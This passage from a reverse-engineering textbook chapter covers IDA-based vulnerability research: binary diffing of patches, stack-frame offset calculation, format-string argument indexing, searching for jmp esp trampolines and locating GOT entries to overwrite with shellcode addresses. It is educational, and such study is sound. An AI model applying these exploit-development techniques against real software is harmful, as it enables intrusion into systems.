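    0x820: ("arg_0", 4),
}
report = find_stack_buffers(frame, 0x824, 16)

# Declaring var_818 as a 1,024-byte array does not change the result.
frame_sized = dict(frame)
frame_sized[0x000] = ("var_818", 1024)
report_sized = find_stack_buffers(frame_sized, 0x824, 16)
```

Both layouts yield the same two candidates because the computation depends only on where each member starts, not on how large IDA or the user has declared it to be.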

Creating a main function that iterates through all functions in a database

(see Chapter 15) and calls findStackBuffers for each function yields a script

that quickly points out the use of stack buffers within a program. Of course,

determining whether any of those buffers can be overflowed requires addi-

tional (usually manual) study of each function. The tedious nature of static

analysis is precisely the reason that fuzz testing is so popular.

After-the-Fact Vulnerability Discovery with IDA

A perpetual debate rages over the exact process by which software vulnerabili-

ties should be disclosed. For any vulnerability discovered in a piece of software,

we can assign the roles of discoverer (of the vulnerability) and maintainer (of

the software). In addition, we can specify a number of events, which may or

may not take place, surrounding the discovery of any vulnerability. Some of

these events are briefly described here. Please keep in mind that the entire

vulnerability-disclosure process is hotly debated, and the following terms are

by no means standardized or even widely accepted.

Discovery

The time at which a vulnerability is initially discovered. For our pur-

poses, we will also consider this to be the time at which an exploit for

that vulnerability is initially developed.

Notification

The time at which the software maintainer is initially made aware of the

vulnerability within its product. This may coincide with discovery if the

vendor happens to find the vulnerability itself.

Disclosure

The time at which a vulnerability is made known to the public. This

event can be muddied by the level of detail made available regarding

the vulnerability. Disclosure may or may not be accompanied by the

release or identification of working exploits. In some cases disclosure

also serves as notification to the vendor.

Mitigation

The time at which steps are published that, if followed, may prevent a

user from falling victim to an existing exploit. Mitigation steps are work-

around solutions for users awaiting the publication of a patch.


Patch availability

The time at which the maintainer (or a third party) makes available a

corrected version of the vulnerable software.

Patch application

The time at which users actually install the updated, corrected software,

rendering themselves immune (hopefully) to all known attacks that rely

on the presence of the given vulnerability.

A wealth of papers are more than happy to tell you all about windows of

vulnerability, obligations on the part of the discoverer and the maintainer,

and exactly how much information should be disclosed and when that disclo-

sure should take place. Getting to the point, it is common for disclosure to

coincide with the availability of a patch.

In most cases, a vulnerability advisory is published in conjunction with

the patch. The vulnerability advisory provides some level of technical detail

describing the nature and severity of the problem that has been patched,

but the level of detail is usually insufficient to use in developing a working

exploit for the problem. Why anyone would want to develop a working exploit

is another matter. Clearly some people are interested in exploiting comput-

ers that remain unpatched, and the faster an exploit can be developed, the

greater their chance of exploiting more computers. In other cases, vendors

may be interested in developing tools that scan for the presence of unpatched

systems on networks or in developing techniques for real-time detection of

exploitation attempts. In most cases, development of such tools requires a

detailed understanding of the exact nature of the newly patched vulnerability.

Advisories may lack such essential information as the exact file or files

that contain the vulnerability, the name or location of any vulnerable func-

tions, and exactly what was changed within those functions. The patched files

themselves, however, contain all the information that an exploit developer

requires in order to develop a working exploit for the newly patched vulnera-

bility. This information is not immediately obvious, nor is it clearly intended

for the consumption of an exploit developer. Instead, this information is

present in the form of the changes that were made in order to eliminate

the underlying vulnerability. The easiest way to highlight such changes is to

compare a patched binary against its unpatched counterpart. If we have the

luxury of looking for differences in patched source files, then standard text-

oriented comparison utilities such as diff can make short work of pinpoint-

ing changes. Unfortunately, tracking down behavioral changes between two

revisions of a binary file is far more complicated than simple text file diffing.

The difficulty with using difference computation to isolate the changes

in two binaries lies in the fact that binaries can change for several reasons.

Changes may be triggered by compiler optimizations, changes to the com-

piler itself, reorganization of source code, addition of code unrelated to the

vulnerability, and of course the code that patches the vulnerability itself. The

challenge lies in isolating behavioral changes (such as those required to fix

the vulnerability) from cosmetic changes (such as the use of different regis-

ters to accomplish the same task).
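One common way to keep cosmetic changes from drowning out behavioral ones is to normalize each function before comparing it. The sketch below is an assumption-laden illustration rather than the method used by any particular diffing tool: it replaces every x86 general-purpose register name with a placeholder and hashes what is left, so that two functions differing only in register allocation compare equal. The regular expression, the signature function, and the three sample instruction lists are invented for the example.

```python
import hashlib
import re

# Matches 32-bit, 16-bit, and 8-bit general-purpose register names.
REG = re.compile(r"\b(?:e?(?:ax|bx|cx|dx|si|di|bp|sp)|[abcd][lh])\b")

def signature(instructions):
    """Hash a function's instructions with register names abstracted away."""
    normalized = [REG.sub("REG", insn.lower()) for insn in instructions]
    return hashlib.sha1("\n".join(normalized).encode()).hexdigest()

original = ["mov esi, [ebp+8]", "push esi", "call strcpy"]
# Same behavior, different register choice (a cosmetic change).
cosmetic = ["mov edi, [ebp+8]", "push edi", "call strcpy"]
# A length argument and a different callee (a behavioral change).
patched = ["mov esi, [ebp+8]", "push 100h", "push esi", "call strncpy"]

same_after_cosmetic_change = signature(original) == signature(cosmetic)
same_after_patch = signature(original) == signature(patched)
```

The normalization is coarse: collapsing all registers into one placeholder can also hide genuine changes, such as swapped operands, which is one reason practical tools combine several independent features instead of relying on a single hash.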


A number of tools designed specifically for binary diffing are available,

including the commercial BinDiff from Zynamics;5 the free Binary Diffing

Suite (BDS) from eEye Digital Security;6 Turbodiff,7 also free and available

from Core Labs (part of Core Security, makers of Core Impact8); and

PatchDiff29 by Nicolas Pouvesle. Each of these tools relies on IDA

in one way or another. BinDiff and BDS make use of IDA scripts and plug-ins

to perform initial analysis tasks on both the patched and the unpatched ver-

sions of the binaries being analyzed. Information extracted by the plug-ins is

stored in a backend database, and each tool provides a graph-based display
for navigating the differences detected during the analysis phase.

Turbodiff and PatchDiff2 are implemented as IDA plug-ins and display their

results within IDA itself. The ultimate goal of these tools is to quickly high-

light the changes made to patch a vulnerability in order to understand why

the code was vulnerable in the first place. Additional information on each

tool is available on its respective website.

Representative of the free diffing tools, PatchDiff2 is an open source

project offering compiled, 32- and 64-bit Windows versions of the plug-in

along with subversion access to the plug-in source. Installing the plug-in

involves copying the plug-in binaries into <IDADIR>/plugins.

The first step in using PatchDiff2 is to create two separate IDA databases,

one for each of the two binaries to be compared. Typically one of these data-

bases would be created for the original version of the binary, while the other

database would be created for the patched version of the binary.

Invoking the plug-in typically involves opening the database for the original
binary and then activating PatchDiff2 via the Edit▸Plugins menu or its

associated hot key (default is CTRL-8). PatchDiff2 refers to the database from

which you invoke the plug-in as IDB1, or the “first idb.” Upon activation,

PatchDiff2 will ask to open the second database against which the currently

open database will be compared; this database is known as IDB2, or the “sec-

ond idb.” Once a second database has been selected, PatchDiff2 computes a

number of identifying features for every function in each database including

5. See http://www.zynamics.com/bindiff.html. Note that in March 2011, Zynamics was acquired by

Google.

6. See http://research.eeye.com/html/tools/RT20060801-1.html.

7. See http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=turbodiff.

8. See http://www.coresecurity.com/content/core-impact-overview/.

9. See http://code.google.com/p/patchdiff2. Note also that Alexander Pick has ported PatchDiff2 to

IDA 6.0 for OS X. For more information please see https://github.com/alexander-pick/patchdiff2_ida6.

Name          PatchDiff2
Author        Nicolas Pouvesle
Distribution  Source and binaries for IDA 5.7
Price         Free
Description   Binary difference generation and display
Information   http://code.google.com/p/patchdiff2/


various types of signatures, hash values, and CRC values. Utilizing these fea-

tures, PatchDiff2 creates three lists of functions titled Identical Functions,

Unmatched Functions, and Matched Functions. Each of these lists is displayed in

a new tabbed window opened by PatchDiff2.

The Identical Functions list contains the list of functions that PatchDiff2

deems to be identical in both databases. From an analysis point of view, these

functions are likely to be uninteresting because they contribute nothing to

the changes that produced the patched version of the binary.

The Unmatched Functions list shows functions from both databases that

do not appear to be similar to one another according to the metrics applied

by PatchDiff2. In practice, these functions either have been added to the
patched version, have been removed from the unpatched version, or are too similar to

other functions within the same binary to be able to distinguish them from

corresponding functions in the second binary. With careful manual analysis

it is often possible to match pairs of functions within the Unmatched Func-

tions list. As a general rule of thumb, it is a good idea to manually compare

the structure of functions that have similar numbers of signatures. To facili-

tate this, it is best to sort the list based on the sig column so that functions

with similar numbers of signatures are listed near one another. The first few

lines of an unmatched functions list sorted on sig are shown here.

File  Function name  Function address  Sig       Hash      CRC
----  -------------  ----------------  ---       ----      ---
1     sub_7CB25FE9   7CB25FE9          000000F0  F4E7267B  411C3DCC
1     sub_7CB6814C   7CB6814C          000000F0  F4E7267B  411C3DCC
2     sub_7CB6819A   7CB6819A          000000F0  F4E7267B  411C3DCC
2     sub_7CB2706A   7CB2706A          000000F0  F4E7267B  411C3DCC

It is clear that the two functions from file one are related to the two func-

tions from file two; however, PatchDiff2 is unable to determine how to pair

them up. It is not uncommon to see multiple functions with identical struc-

tures in binaries that make use of the C++ standard template library (STL). If

you are able to manually match a function from one file to its corresponding

function in the other file, you may use PatchDiff2’s Set Match feature (avail-

able on the context-sensitive menu) to choose one function in the list and

match it to a second function in the list. Figure 22-1 shows the Set Match

dialog.

Figure 22-1: Manually matching functions

with PatchDiff2


Manual matching begins when you choose one function using the Set

Match menu option. In the resulting dialog, you must enter the address of

the matching function in the file you are not viewing. The Propagate option

asks PatchDiff2 to match as many additional functions as it can, given that

you have informed it of a new match.
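The ambiguity described above can be illustrated outside IDA. The following is a minimal standalone Python 3 sketch, not PatchDiff2's actual matching algorithm: it assumes that a function is identified only by its (sig, hash, CRC) tuple, and the helper names group_by_features and classify are hypothetical. The rows are the four entries from the Unmatched Functions listing shown earlier.

```python
from collections import defaultdict

# (file, function name, sig, hash, crc) rows copied from the listing above
ROWS = [
    (1, "sub_7CB25FE9", 0x000000F0, 0xF4E7267B, 0x411C3DCC),
    (1, "sub_7CB6814C", 0x000000F0, 0xF4E7267B, 0x411C3DCC),
    (2, "sub_7CB6819A", 0x000000F0, 0xF4E7267B, 0x411C3DCC),
    (2, "sub_7CB2706A", 0x000000F0, 0xF4E7267B, 0x411C3DCC),
]


def group_by_features(rows):
    """Bucket function names by their (sig, hash, crc) tuple, per file."""
    groups = defaultdict(lambda: {1: [], 2: []})
    for file_no, name, sig, hash_value, crc in rows:
        groups[(sig, hash_value, crc)][file_no].append(name)
    return dict(groups)


def classify(groups):
    """Split buckets into unambiguous pairs and buckets needing manual review."""
    pairs, ambiguous = [], []
    for features, by_file in groups.items():
        if len(by_file[1]) == 1 and len(by_file[2]) == 1:
            pairs.append((by_file[1][0], by_file[2][0]))
        else:
            ambiguous.append((features, by_file))
    return pairs, ambiguous


pairs, ambiguous = classify(group_by_features(ROWS))
print("unambiguous pairs:", pairs)
for (sig, hash_value, crc), by_file in ambiguous:
    print("sig=%08X: file 1 %s vs. file 2 %s" % (sig, by_file[1], by_file[2]))
```

Because all four functions share one feature tuple, no unique pairing exists, which is exactly the situation in which a manual Set Match is needed.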

The Matched Functions list contains the list of functions that PatchDiff2

deems sufficiently similar, yet not quite identical, according to the metrics
applied in the matching process. Right-clicking any entry in this list and

selecting Display Graphs causes PatchDiff2 to display flow graphs for the

two matched functions. One such pair of graphs is shown in Figure 22-2.

PatchDiff2 makes use of color coding to highlight blocks that have been

introduced into the patched version of the binary, making it easy to focus

on the changed portions of the code.

Figure 22-2: PatchDiff2 graphical function comparison

In these graphs, blocks ➊ through ➍ are present in both functions, while
block ➎ has been added in the patched version of the function. During
differential analysis, matched functions may be of the highest interest initially

because they are likely to contain the changes that have been incorporated

into the patched binary that address vulnerabilities discovered in the original

binary. Close study of these changes may reveal the corrections that have been

made or safety checks that have been added in order to address incorrect

behavior or exploitable conditions. If we fail to find any interesting changes

highlighted in the Matched Functions list, then the Unmatched Functions

list is our only other option for attempting to locate the patched code.


IDA and the Exploit-Development Process

Assuming that you manage to locate a potentially exploitable vulnerability,
how can IDA help with the exploit-development process? To answer this
question, you must first understand what type of help you need so that you
can make use of the appropriate features of IDA.

IDA is very good at several things that can save you a tremendous

amount of trial and error when developing exploits:

• IDA graphs can be useful in determining control flow paths as a means
  of understanding how a vulnerable function may be reached. Careful
  selection of graph-generation parameters may be required in large binaries
  in order to minimize the complexity of generated graphs. Refer to
  Chapter 9 for more information on IDA graphs.

• IDA breaks down stack frames to a great level of detail. If you are
  overwriting information in the stack, IDA will help you understand exactly
  what is getting overwritten by which portions of your buffer. IDA stack
  displays are also invaluable in determining the memory layout of format
  string buffers.

• IDA has excellent search facilities. If you need to search for a specific
  instruction (such as jmp esp) or sequence of instructions (such as
  pop/pop/ret) within a binary, IDA can rapidly tell you whether the
  instruction(s) is present in the binary and, if so, the exact virtual
  address at which the instruction(s) is located.

• The fact that IDA maps binaries as if they are loaded in memory makes
  it easier for you to locate virtual addresses that you may require in order
  to land your exploit. IDA’s disassembly listings make it simple to
  determine the virtual address of any globally allocated buffers as well as
  useful addresses (such as GOT entries) to target when you have a write4
  capability.10

We will discuss several of these capabilities and how you can leverage

them in the following sections.

Stack Frame Breakdown

While stack-protection mechanisms are rapidly becoming standard features

in modern operating systems, many computers continue to run operating

systems that allow code to be executed in the stack, as is done in a plain-

vanilla stack-based buffer-overflow attack. Even when stack protections are

in place, overflows may be used to corrupt stack-based pointer variables,

which can be further leveraged to complete an attack.

10. A write4 capability presents an attacker with the opportunity to write 4 bytes of his choosing to a memory location of his choosing.

Regardless of what you intend to do when you discover a stack-based
buffer overflow, it is vital to understand exactly what stack content will be
overwritten as your data overflows the vulnerable stack buffer. You will
probably also be interested in knowing exactly how many bytes you need to write
into the buffer until you can control various variables within the function’s
stack frame, including the function’s saved return address. IDA’s default stack
frame displays can answer all of these questions if you are willing to do a little
math. The distance between any two variables in the stack can be computed
by subtracting the stack offsets of the two variables. The following stack frame
includes a buffer that can be overflowed when input to the corresponding
function is carefully controlled:

-0000009C result       dd ?
-00000098 buffer_132   db 132 dup(?)    ; this can be overflowed
-00000014 p_buf        dd ?             ; pointer into buffer_132
-00000010 num_bytes    dd ?             ; bytes read per loop
-0000000C total_read   dd ?             ; total bytes read
-00000008              db ? ; undefined
-00000007              db ? ; undefined
-00000006              db ? ; undefined
-00000005              db ? ; undefined
-00000004              db ? ; undefined
-00000003              db ? ; undefined
-00000002              db ? ; undefined
-00000001              db ? ; undefined
+00000000  s           db 4 dup(?)
+00000004  r           db 4 dup(?)      ; saved return address
+00000008 filedes      dd ?             ; socket descriptor

The distance from the beginning of the vulnerable buffer (buffer_132)
to the saved return address is 156 bytes (4 - (-98h), or 4 + 152). You can also
see that after 132 bytes (-14h - (-98h)), the contents of p_buf will start to get

overwritten, which may or may not cause problems. You must clearly under-

stand the effect of overwriting variables that lie beyond the end of the buffer

in order to prevent the target application from crashing before the exploit

can be triggered. In this example, filedes (a socket descriptor) might be

another problematic variable. If the vulnerable function expects to use the

socket descriptor after you have finished overflowing the buffer, then you

need to take care that any overwriting of filedes will not cause the function

to error out unexpectedly. One strategy for dealing with variables that will be

overwritten is to write values into these variables that make sense to the pro-

gram so that the program continues to function normally until your exploit

is triggered.
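The offset arithmetic described above is easy to get wrong by hand because the local-variable offsets are negative hexadecimal values. The following is a small standalone Python 3 sketch (it does not use the IDA API) that repeats the two subtractions from the text. The OFFSETS table is copied from the stack frame listing; the distance helper is a hypothetical name introduced only for illustration.

```python
# Frame offsets copied from the stack frame listing above.
# Negative offsets are local variables; s and r are IDA's names for the
# saved registers and the saved return address.
OFFSETS = {
    "result": -0x9C,
    "buffer_132": -0x98,
    "p_buf": -0x14,
    "num_bytes": -0x10,
    "total_read": -0x0C,
    "s": 0x00,
    "r": 0x04,
    "filedes": 0x08,
}


def distance(src, dst):
    """Bytes written starting at src before the first byte of dst is reached."""
    return OFFSETS[dst] - OFFSETS[src]


print("bytes before p_buf is touched:", distance("buffer_132", "p_buf"))
print("bytes before the return address is touched:", distance("buffer_132", "r"))
```

The two values printed correspond to the 132-byte and 156-byte figures derived in the text.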

For a slightly more readable breakdown of a stack frame, we can modify

the stack buffer–scanning code from Listing 22-3 to enumerate all members

of a stack frame, compute their apparent size, and display the distance from

each member to the saved return address. Listing 22-4 shows the resulting

script.

func = ScreenEA()  # process function at cursor location
frame = GetFrame(func)
if frame != -1:
    Message("Enumerating stack for %s\n" % GetFunctionName(func))
    eip_loc = GetFrameLvarSize(func) + GetFrameRegsSize(func)  # ➊
    prev_idx = -1
    idx = 0
    while idx < GetStrucSize(frame):
        member = GetMemberName(frame, idx)
        if member is not None:
            if prev_idx != -1:
                # compute distance from previous field to current field
                delta = idx - prev_idx
                Message("%15s: %4d bytes (%4d bytes to eip)\n" %
                        (prev, delta, eip_loc - prev_idx))
            prev_idx = idx
            prev = member
            idx = idx + GetMemberSize(frame, idx)
        else:
            idx = idx + 1
    if prev_idx != -1:
        # make sure we print the last field in the frame
        delta = GetStrucSize(frame) - prev_idx
        Message("%15s: %4d bytes (%4d bytes to eip)\n" %
                (prev, delta, eip_loc - prev_idx))

Listing 22-4: Enumerating a single stack frame using Python

This script introduces the GetFrameLvarSize and GetFrameRegsSize func-

tions (also available in IDC). These functions are used to retrieve the size of

a stack frame’s local variable and saved register areas, respectively. The saved

return address lies directly beneath these two areas, and the offset to the

saved return address is computed as the sum of these two values ➊. When

executed against our example function, the script produces the following

output:

Enumerating stack for handleSocket
         result:    4 bytes ( 160 bytes to eip)
     buffer_132:  132 bytes ( 156 bytes to eip)
          p_buf:    4 bytes (  24 bytes to eip)
      num_bytes:    4 bytes (  20 bytes to eip)
     total_read:   12 bytes (  16 bytes to eip)
              s:    4 bytes (   4 bytes to eip)
              r:    4 bytes (   0 bytes to eip)
        filedes:    4 bytes (  -4 bytes to eip)

The results offer a concise summary of a function’s stack frame anno-

tated with additional information of potential use to an exploit developer.
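To see why total_read is reported as 12 bytes even though it is declared as a 4-byte dd, it can help to replay the script's logic outside IDA. The following standalone Python 3 sketch is an approximation under stated assumptions: the MEMBERS table is transcribed by hand from the example frame, and summarize is a hypothetical helper that mimics the "distance to the next named member" calculation rather than calling any IDA function.

```python
# (name, frame offset, declared size) for each named member of the example frame
MEMBERS = [
    ("result", -0x9C, 4),
    ("buffer_132", -0x98, 132),
    ("p_buf", -0x14, 4),
    ("num_bytes", -0x10, 4),
    ("total_read", -0x0C, 4),
    ("s", 0x00, 4),
    ("r", 0x04, 4),
    ("filedes", 0x08, 4),
]
RET_OFFSET = 0x04  # frame offset of the saved return address (r)


def summarize(members, ret_offset):
    """Return (name, apparent size, distance to return address) per member.

    The apparent size is the gap to the next named member, so undefined
    bytes that follow a member are attributed to that member.
    """
    rows = []
    frame_end = members[-1][1] + members[-1][2]
    for i, (name, offset, _declared) in enumerate(members):
        next_offset = members[i + 1][1] if i + 1 < len(members) else frame_end
        rows.append((name, next_offset - offset, ret_offset - offset))
    return rows


rows = summarize(MEMBERS, RET_OFFSET)
for name, apparent, to_ret in rows:
    print("%15s: %4d bytes (%4d bytes to eip)" % (name, apparent, to_ret))
```

The eight undefined bytes between total_read and s have no name, so they are folded into total_read's apparent size, which is why the script calls the size "apparent."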

IDA’s stack frame displays also prove useful when developing exploits for

format string vulnerabilities. As an example, consider the following short

code fragment in which the fprintf function is invoked with a user-supplied

buffer provided as the format string.


  .text:080488CA    lea     eax, [ebp+format]
➋ .text:080488D0    mov     [esp+4], eax      ; format
  .text:080488D4    mov     eax, [ebp+stream]
➊ .text:080488DA    mov     [esp], eax        ; stream
  .text:080488DD    call    _fprintf

In this example, only two arguments are passed to fprintf, a file pointer
➊ and the address of the user’s buffer as a format string ➋. These arguments

occupy the top two positions on the stack, memory that has already been allo-

cated by the calling function as part of the function’s prologue. The stack

frame for the vulnerable function is shown in Listing 22-5.

➊ -00000128          db ? ; undefined
  -00000127          db ? ; undefined
  -00000126          db ? ; undefined
  -00000125          db ? ; undefined
➋ -00000124          db ? ; undefined
  -00000123          db ? ; undefined
  -00000122          db ? ; undefined
  -00000121          db ? ; undefined
  -00000120          db ? ; undefined
  -0000011F          db ? ; undefined
  -0000011E          db ? ; undefined
  -0000011D          db ? ; undefined
  -0000011C          db ? ; undefined
  -0000011B          db ? ; undefined
  -0000011A          db ? ; undefined
  -00000119          db ? ; undefined
  -00000118 s1       dd ?                ; offset
  -00000114 stream   dd ?                ; offset
  -00000110 format   db 264 dup(?)

Listing 22-5: Stack frame for format string example

The 16 undefined bytes spanning frame offsets -128h through -119h represent
the block of memory that the compiler (gcc in this case) has preallocated
for the arguments passed to the functions that will be called by the
vulnerable function. The stream argument to fprintf will be placed at the top
of the stack ➊, while the format string pointer will be placed immediately
below the stream argument ➋.

In format string exploits, an attacker is often interested in the distance

from the format string pointer to the beginning of the buffer holding the

attacker’s input. In the preceding stack frame, 16 bytes separate the format

string argument from the actual format string buffer. To further the discus-

sion, we will assume that an attacker has entered the following format string.

"%x %x %x %x %x"


Here, fprintf would expect five arguments immediately following the

format string argument. The first four of these arguments would occupy the

space between the format string argument and the format string buffer. The

fifth, and final, of these arguments would overlap the first four bytes of the

format string buffer itself. Readers familiar with format string exploits11 will

know that arguments within a format string may be named explicitly by index

number. The following format string demonstrates accessing the fifth argu-

ment following the format string in order to format it as a hexadecimal

value.

"%5$x"

Continuing with the preceding example, this format string would read

the first 4 bytes of the format string buffer as an integer (which we previously

noted would occupy the space of the fifth argument to the format string

should one have been required), format that integer as a hexadecimal value,

and then output the result to the specified file stream. Additional arguments

to the format string (the sixth, seventh, and so on) would overlap successive

4-byte blocks within the format string buffer.
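The index arithmetic in the preceding discussion can be written down directly. The following standalone Python 3 sketch assumes 4-byte argument slots (32-bit x86, as in the example) and takes its two frame offsets from Listing 22-5; the function name first_arg_index_in_buffer is hypothetical and is used here only to illustrate the calculation.

```python
FORMAT_ARG_SLOT = -0x124  # frame offset where the format string pointer is stored
FORMAT_BUFFER = -0x110    # frame offset of the start of the format buffer
ARG_SIZE = 4              # assumed size of one argument slot on 32-bit x86


def first_arg_index_in_buffer(fmt_slot, buf_start, arg_size=ARG_SIZE):
    """Return the 1-based index of the first argument that overlaps the buffer."""
    first_vararg = fmt_slot + arg_size  # slot immediately after the format pointer
    gap = buf_start - first_vararg      # bytes between that slot and the buffer
    if gap < 0 or gap % arg_size != 0:
        raise ValueError("buffer is not aligned to an argument slot")
    return gap // arg_size + 1


index = first_arg_index_in_buffer(FORMAT_ARG_SLOT, FORMAT_BUFFER)
specifier = "%{}$x".format(index)
print("gap of %d bytes, first overlapping argument is #%d, e.g. %s"
      % (FORMAT_BUFFER - (FORMAT_ARG_SLOT + ARG_SIZE), index, specifier))
```

With the offsets from Listing 22-5, the 16-byte gap holds four argument slots, so the fifth argument is the first one that reads from the buffer itself.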

Crafting a format string that will work properly to exploit a vulnerable

binary can be tricky and generally relies on precise specification of arguments

within the format string. The preceding discussion demonstrates that, in many

cases, IDA may be used to quickly and accurately compute required offsets

into a format string buffer. By combining this information with information

that IDA presents when disassembling various program sections, such as

the global offset table (.got) or the destructor table (.dtor), a correct format

string may be derived accurately with no trial and error as might be required

when using only a debugger to develop an exploit.

Locating Instruction Sequences

In order to reliably land an exploit, it is often useful to employ a control-

transfer mechanism that does not require you to know the exact memory

address at which your shellcode resides. This is particularly true when

your shellcode lies in the heap or the stack, which may make the address

of your shellcode unpredictable. In such cases, it is desirable to find a regis-

ter that happens to point at your shellcode at the time your exploit is trig-

gered. For example, if the ESI register is known to point at your shellcode at

the moment you take control of the instruction pointer, it would be very

helpful if the instruction pointer happened to point to a jmp esi or call esi

instruction, which would vector execution to your shellcode without requiring
you to know the exact address of your shellcode. Similarly, a jmp esp is
often a very handy way to transfer control to shellcode that you have placed
in the stack. This takes advantage of the fact that when a function containing
a vulnerable buffer returns, the stack pointer will be left pointing just below
the same saved return address that you just overwrote. If you continued to
overwrite the stack beyond the saved return address, then the stack pointer is
pointing at your data (which should be code!). The combination of a register
pointing at your shellcode along with an instruction sequence that redirects
execution by jumping to or calling the location pointed to by that register is
called a trampoline.

11. Readers wishing to learn more about format string exploits might again refer to Jon Erickson’s Hacking: The Art of Exploitation, 2nd Edition.

The notion of searching for such instruction sequences is not a new one.

In Appendix D of his paper “Variations in Exploit Methods between Linux

and Windows,”12 David Litchfield presents a program named getopcode.c

designed to search for useful instructions in Linux ELF binaries. Along simi-

lar lines, the Metasploit13 project offers its msfpescan tool, which is capable of

scanning Windows PE binaries for useful instruction sequences. IDA is just as

capable of locating interesting instruction sequences as either of these tools

when given the chance.

For the sake of example, assume that you would like to locate a jmp esp

instruction in a particular x86 binary. You could use IDA’s text-search fea-

tures to look for the string jmp esp, which you would only find if you hap-

pened to have exactly the right number of spaces between jmp and esp and

which you are unlikely to find in any case because a jump into the stack is sel-

dom used by any compiler. So why bother searching in the first place? The

answer lies in the fact that what you are actually interested in is not an occur-

rence of the disassembled text jmp esp but rather the byte sequence FF E4,

regardless of its location. For example, the following instruction contains an

embedded jmp esp:

.text:080486CD B8 FF FF E4 34 mov eax, 34E4FFFFh

Virtual address 080486CFh may be used if a jmp esp is desired. IDA’s

binary search (SearchSequence of Bytes) capability is the correct way to

rapidly locate byte sequences such as these. When performing a binary

search for exact matches against a known byte sequence, remember to per-

form a case-sensitive search, or a byte sequence such as 50 C3 (push eax/ret)

will be matched by the byte sequence 70 C3 (because 50h is an uppercase P,

while 70h is a lowercase p), which is a jump on overflow with a relative offset

of –61 bytes. Binary searches can be scripted using the FindBinary function, as

shown here:

ea = FindBinary(MinEA(), SEARCH_DOWN | SEARCH_CASE, "FF E4");

This function call begins searching down (toward higher addresses)

from the lowest virtual address in the database, in a case-sensitive manner,

in search of a jmp esp (FF E4). If the sequence is found, the return value is the
virtual address of the start of the byte sequence. If the sequence is not found,
the return value is BADADDR (–1).

12. See http://www.nccgroup.com/Libraries/Document_Downloads/Variations_in_Exploit_methods_between_Linux_and_Windows.sflb.ashx.

13. See http://www.metasploit.com/.

A script that automates searches for a wider variety of instructions is
available on the book’s website. Using this script, we might request a search
for instructions that transfer control to the location pointed to by the EDX
register and receive results similar to the following:

Searching...

Found jmp edx (FF E2) at 0x80816e6

Found call edx (FF D2) at 0x8048138

Found 2 occurrences

Convenience scripts such as these can save a substantial amount of time

while ensuring that we don’t forget to cover all possible cases as we search for

items in a database.
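The idea of searching for opcode bytes rather than disassembly text can also be tried outside IDA. The following standalone Python 3 sketch is not the script from the book's website; it is a minimal illustration that assumes the standard 32-bit x86 encodings (FF E0+r for jmp reg, FF D0+r for call reg, and 50+r C3 for push reg/ret), and the helper names trampoline_patterns and find_all are hypothetical. The sample bytes are the mov eax, 34E4FFFFh instruction shown earlier.

```python
# 32-bit x86 register numbers as used in the opcode encodings
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def trampoline_patterns(reg):
    """Return byte patterns that transfer control to the address held in reg."""
    n = REGS.index(reg)
    return {
        "jmp %s" % reg: bytes([0xFF, 0xE0 + n]),
        "call %s" % reg: bytes([0xFF, 0xD0 + n]),
        "push %s/ret" % reg: bytes([0x50 + n, 0xC3]),
    }


def find_all(data, pattern, base):
    """Return the virtual address of every (possibly overlapping) match."""
    hits = []
    pos = data.find(pattern)
    while pos != -1:
        hits.append(base + pos)
        pos = data.find(pattern, pos + 1)
    return hits


code = bytes.fromhex("B8 FF FF E4 34")  # mov eax, 34E4FFFFh
base = 0x080486CD                       # virtual address of the first byte
for name, pattern in trampoline_patterns("esp").items():
    for ea in find_all(code, pattern, base):
        print("Found %s (%s) at 0x%x" % (name, pattern.hex(), ea))
```

Because bytes.find compares bytes exactly, this search has no equivalent of the case-insensitivity pitfall described above for 50 C3 versus 70 C3.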

Finding Useful Virtual Addresses

The last item we will mention briefly is IDA’s display of virtual addresses in its

disassemblies. Situations in which we know that our shellcode is going to end

up in a static buffer (in a .data or .bss section, for example) are almost always

better than situations in which our shellcode lands in the heap or the stack,

because we end up with a known, fixed address to which we can transfer con-

trol. This usually eliminates the need for NOP slides or the need to find spe-

cial instruction sequences.

Some exploits take advantage of the fact that attackers are able to write

any data they like to any location they choose. In many cases, this may be

restricted to a 4-byte overwrite, but this amount often turns out to be suffi-

cient. When a 4-byte overwrite is possible, one alternative is to overwrite a

function pointer with the address of our shellcode. The dynamic linking

process used in most ELF binaries utilizes a table of function pointers called

the global offset table (GOT) to store addresses of dynamically linked library

functions. When one of these table entries can be overwritten, it is possible

to hijack a function call and redirect the call to a location of the attacker’s

choosing. A typical sequence of events for an attacker in such cases is to stage
shellcode in a known location and then overwrite the GOT entry for the next
library function to be called by the exploited program. When the library
function is called, control is instead transferred to the attacker’s shellcode.

NOP SLIDES

A NOP slide is a long sequence of consecutive nop (do nothing) instructions that
provides a wider target for hitting our shellcode when the address of our shellcode is
known to be somewhat variable. Rather than targeting the first useful instruction of
our shellcode, we target the middle of the NOP slide. If the NOP slide (and hence
the rest of our payload) shifts slightly up or down in memory, we still have a good
chance of landing somewhere within the slide and successfully running into our
shellcode. For example, if we have room for 500 NOPs as a prefix for our shellcode,
we can target the middle of the slide and still hit the slide as long as the address
that we guess for the middle of the slide is within 250 bytes of the actual address.

The addresses of GOT entries are easily found in IDA by scrolling to the

.got section and browsing for the function whose entry you wish to overwrite.

In the name of automating as much as possible, though, the following Python

script quickly reports the address of the GOT entry that will be used by a

given function call:

ea = ScreenEA()
dref = ea
for xref in XrefsFrom(ea, 0):
    if xref.type == fl_CN and SegName(xref.to) == ".plt":  # ➊
        for dref in DataRefsFrom(xref.to):  # ➋
            Message("GOT entry for %s is at 0x%08x\n" %
                    (GetFunctionName(xref.to), dref))
            break
if ea == dref:
    Message("Sorry this does not appear to be a library function call\n")

This script is executed by placing the cursor on any call to a library func-

tion, such as the following, and invoking the script.

.text:080513A8 call _memset

The script operates by walking forward through cross-references until

the GOT is reached. The first cross-reference that is retrieved ➊ is tested to
ensure that it is a call reference and that it references the ELF procedure
linkage table (.plt). PLT entries contain code that reads a GOT entry and
transfers control to the address specified in the GOT entry. The second
cross-reference retrieved ➋ obtains the address of the location being read from

the PLT, and this is the address of the associated GOT entry. When executed

on the preceding call to _memset, the output of the script on our example

binary yields the following:

GOT entry for .memset is at 0x080618d8

This output provides us with exactly the information we require if our

intention is to take control of the program by hijacking a call to memset, namely

that we need to overwrite the contents of address 0x080618d8 with the address

of our shellcode.
